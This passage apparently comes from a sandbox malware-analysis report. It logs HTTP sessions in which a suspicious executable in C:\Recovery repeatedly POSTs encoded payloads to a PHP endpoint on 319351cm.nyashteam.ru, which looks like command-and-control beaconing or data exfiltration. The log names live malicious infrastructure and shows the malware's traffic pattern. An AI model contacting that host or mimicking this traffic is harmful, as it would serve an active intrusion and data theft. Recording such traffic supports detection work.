98%[$-454Z.Q&.>,8^"9(?<'(),9_><8)8#[&^)&(:;'3\=6>>,!*:#>0$-8%(Q1&!^9&32^#(/Q%8X+8$(+4'%"60':! <?Q-#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.6	50099	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:40.131815910 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:40.485650063 CET	1012	OUT	Data Raw: 56 50 5f 5a 59 5e 53 58 5c 56 52 5a 50 5f 5a 51 58 5d 5b 59 50 5e 56 54 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VP_ZY^SX\VRZP_ZQX][YP^VTZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"A(0>T#(5/&.1/<'1)$7Y2'*/]5^7R,']/!Q!4
Dec 6, 2024 03:14:41.218131065 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:41.486197948 CET	811	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ty2Q9SRWTH%2Bx6IrlWgtCp0mf8Fg0I2HCgS4n9IF%2FvaaSWf7Z80xEDMdBzcGllCnwA%2Frzr1nnkLqm7MM7MHe%2F6b8IFcOrmR053muupGk8uakQk7R4Q6EmTTOe8xPqanUJopihKJ%2BrcAs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c38aae9c558f-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4212&min_rtt=1792&rtt_var=5513&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=69007&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.6	50100	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:41.799694061 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:14:42.154834986 CET	1012	OUT	Data Raw: 53 52 5f 5a 5c 5d 56 5a 5c 56 52 5a 50 5b 5a 52 58 53 5b 5e 50 58 56 58 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SR_Z\]VZ\VRZP[ZRXS[^PXVXZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!(0%\>"+%;'+:2?#3">=+X45&*;687/=']/!Q!$
Dec 6, 2024 03:14:42.990312099 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:43.287653923 CET	808	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KSUjBwwk3iKS6k0vfhsTenkEvN3HWaPAaViS2JErybnWPsxLvrRIdn0zccCJJCH5c61VPronkohc%2BmrAkAvqSfdZ8bMAFBz1dLLkLs8jFsIcL818z9If1Xk453YP4CT8vysT5Lh%2BDUs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c395bfc85e6a-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=21314&min_rtt=17817&rtt_var=13676&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=31881&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.6	50101	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:43.526161909 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:43.873593092 CET	1012	OUT	Data Raw: 53 54 5a 59 59 50 56 53 5c 56 52 5a 50 52 5a 5d 58 5a 5b 5c 50 5b 56 54 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: STZYYPVS\VRZPRZ]XZ[\P[VTZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!)*=1,+%2&2+3]&Y)Y 5S&'^#80/']/!Q!
Dec 6, 2024 03:14:44.702387094 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:44.972028017 CET	805	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t64fsYZSBc33OGy7J0x8Vi36G44ZASx7d5LOA5uEyn46kA54dVgyH%2F3UptxkBX%2BntsScP10Br8OyeeRwVuhBwSXJEWIoretQPggOoRMt4x8UDiLJFizLuDG2waKaOsi0Vsuxco9cInc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c3a06a9a8c78-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4515&min_rtt=1948&rtt_var=5865&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=64929&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.6	50102	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:45.225433111 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:45.576672077 CET	1012	OUT	Data Raw: 56 55 5f 58 5c 58 56 5a 5c 56 52 5a 50 5f 5a 55 58 58 5b 57 50 5a 56 59 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VU_X\XVZ\VRZP_ZUXX[WPZVYZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"A0>!$<S;Z';T173=>/Y#&\;"(U/=']/!Q!4
Dec 6, 2024 03:14:46.322055101 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.6	50103	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:46.530282021 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:46.889159918 CET	1296	OUT	Data Raw: 56 51 5f 59 59 59 56 52 5c 56 52 5a 50 59 5a 54 58 5b 5b 5e 50 54 56 59 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VQ_YYYVR\VRZPYZTX[[^PTVYZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!>>=$>%#'8)U&/ %8:^?Y ,6%#_!(8/']/!Q!,
Dec 6, 2024 03:14:47.616408110 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:47.883711100 CET	955	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mcF2WOvPKrKfi9XZutI%2BrPuuAUc2bjUzJtw4H1wDlBF3lZRy2BBC61ihv8doFgJEQzX9OULoMrj%2BmACKZp3KWZkfkujHJ23raz3R2pAWeq11QP7mqlhbQAin0vJuLsaPrRbOPqYEYVk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c3b2acf7185d-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3137&min_rtt=1645&rtt_var=3601&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=107503&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 25 10 24 2e 34 5b 35 0c 24 12 39 2d 30 13 31 2e 2d 5d 3a 3b 2b 01 23 3b 2a 00 3f 01 33 0c 24 0a 2f 5f 28 3c 39 1d 3c 01 2f 56 2a 12 23 5b 00 13 26 5d 29 5b 26 56 3d 00 3c 5d 32 33 2e 5f 2a 36 26 1f 2a 3e 0a 0b 20 14 2d 15 36 04 3c 57 33 04 3f 10 2c 35 34 17 28 24 21 0a 25 1e 21 5e 0e 11 39 1e 32 55 3e 12 34 3b 24 08 27 23 38 10 28 29 2c 5e 26 3c 3b 57 2b 24 2c 53 30 0f 3d 10 27 3c 3f 0a 32 03 2e 1c 23 2c 2b 51 39 2c 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%$.4[5$9-01.-]:;+#;?3$/_(<9</V#[&])[&V=<]23._6&> -6<W3?,54($!%!^92U>4;$'#8(),^&<;W+$,S0='<?2.#,+Q9,#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.6	50104	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:46.693865061 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:47.045398951 CET	1012	OUT	Data Raw: 56 57 5f 5a 5c 5d 53 58 5c 56 52 5a 50 5b 5a 5d 58 5c 5b 57 50 5d 56 5b 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VW_Z\]SX\VRZP[Z]X\[WP]V[Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"C>!?1?T<&(1;9%,('!)X< =15/-']/!Q!$
Dec 6, 2024 03:14:47.779778957 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:48.041635990 CET	804	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FdMSEV3%2FLiK1UKYr76s6REIlbBberCVwkMWRDfEBxjWLwCtJN5KaU3cA3kcLmgManZbhsmVgS8GQZTzrD1hikBALWI5UYKP0I9Sbn6oNyXfVC2JdY7mm6Wr%2F%2Fh1b6DUXEuKOIUzKNoQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c3b3a82443e6-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4171&min_rtt=1631&rtt_var=5693&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=66496&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a Data Ascii: 42V\U
Dec 6, 2024 03:14:48.234414101 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.6	50105	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:48.474318027 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:14:48.829629898 CET	1012	OUT	Data Raw: 56 55 5f 5a 59 59 53 59 5c 56 52 5a 50 58 5a 57 58 52 5b 59 50 58 56 58 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VU_ZYYSY\VRZPXZWXR[YPXVXZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"@)09Y><?51&%<<$;&(.X4?11:<5^#W/-']/!Q!(
Dec 6, 2024 03:14:49.561439991 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:49.807430983 CET	806	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DAWEsixJNPCPy7bUyZpErF6ttMxur9mm0BDe8Jxki3dg0N4Ugo18mRHA%2B3EJnKTjy%2FDhH%2B7TkPhUGO1B2z%2Fth6ZKE5vvgnUUIfTKdLFyJ8lAOUA69joWDYVFkDiJWaTtpINY%2BCGw758%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c3bec86fde98-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4304&min_rtt=1598&rtt_var=6011&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=62801&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a Data Ascii: 42V\U
Dec 6, 2024 03:14:49.999257088 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.6	50106	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:50.245623112 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:50.593630075 CET	1012	OUT	Data Raw: 53 53 5a 5d 59 59 53 58 5c 56 52 5a 50 5d 5a 56 58 5c 5b 58 50 58 56 59 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SSZ]YYSX\VRZP]ZVX\[XPXVYZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"BV1"(^2;1W2R0%>>/4<=R1#\"3R/']/!Q!
Dec 6, 2024 03:14:51.335412025 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:51.575428963 CET	816	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=23Z0rZvd4n%2B8pIPyfXZ7tiSSGEpbpyAuZYHw%2BlH4p9Jk7Bn1dHQErYfvrI%2BuDGuFipMcQCqGA399bxS%2BNiQnTIfqH15L2mdJS93gF8dkd1%2FE8ZHSyjlN%2FbVlX7q9JeLqq%2B38yj8UhdI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c3c9dfa7727a-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3235&min_rtt=1794&rtt_var=3555&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=109568&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.6	50107	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:51.822628021 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:52.171781063 CET	1012	OUT	Data Raw: 56 50 5f 58 59 5c 56 5a 5c 56 52 5a 50 5d 5a 5d 58 5b 5b 5a 50 5c 56 55 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VP_XY\VZ\VRZP]Z]X[[ZP\VUZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"A= .?2W?/]2*1,03)X7X#Y12#($/']/!Q!
Dec 6, 2024 03:14:52.946060896 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.6	50108	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:53.011579037 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1268 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:53.357965946 CET	1268	OUT	Data Raw: 56 50 5a 5a 5c 5a 53 5e 5c 56 52 5a 50 5b 5a 52 58 58 5b 56 50 54 56 5a 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VPZZ\ZS^\VRZP[ZRXX[VPTVZZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"C(0%)T'?&+Z2;1V%+W0;!>X7] Y-S2)?"?T;-']/!Q!$
Dec 6, 2024 03:14:54.096951008 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:54.361814976 CET	962	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rM%2BdvVH0z%2BHCmuuzokw%2Bu2j7YpZGTJqDv352qudVQB9ulsBCMg2%2BiawQwlvrqZxLfHJOOnZrXwgrVogGbcXxn9wVgkMROuk24F%2BWoMvaeoCNKr6n7b5ke6zow7nYCdyS7Yy8LU%2Biz5Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c3db2a0a420d-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3693&min_rtt=1715&rtt_var=4600&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=1565&delivery_rate=83219&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 26 05 25 2e 3f 02 35 32 05 06 2d 07 33 09 24 2e 25 19 3a 5e 37 00 35 38 21 14 28 59 2f 0f 27 24 2b 5c 3e 02 3a 06 3e 3f 20 08 29 38 23 5b 00 13 26 5a 29 04 35 0f 2a 00 30 5e 27 23 04 5f 2a 36 3a 5b 3e 10 27 14 23 03 26 00 35 3d 0a 52 24 2d 3c 0d 2f 43 3f 03 3f 09 2e 19 25 24 21 5e 0e 11 39 1d 32 1d 39 01 20 38 34 0d 26 1e 05 01 28 5f 24 12 33 2c 30 0e 2b 24 28 1f 24 21 35 57 24 01 33 0c 26 04 0f 06 20 2f 37 12 2d 2c 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&%.?52-3$.%:^758!(Y/'$+\>:>? )8#[&Z)50^'#_6:[>'#&5=R$-</C??.%$!^929 84&(_$3,0+$($!5W$3& /7-,#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.6	50109	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:53.139906883 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:53.498496056 CET	1012	OUT	Data Raw: 53 55 5a 5c 5c 5d 56 5e 5c 56 52 5a 50 5d 5a 5d 58 5d 5b 5e 50 5a 56 5c 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SUZ\\]V^\VRZP]Z]X][^PZV\Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!=Z?"3R+5$%;1S'>4?)&);X#8 ;-']/!Q!
Dec 6, 2024 03:14:54.225871086 CET	25	IN	HTTP/1.1 100 Continue
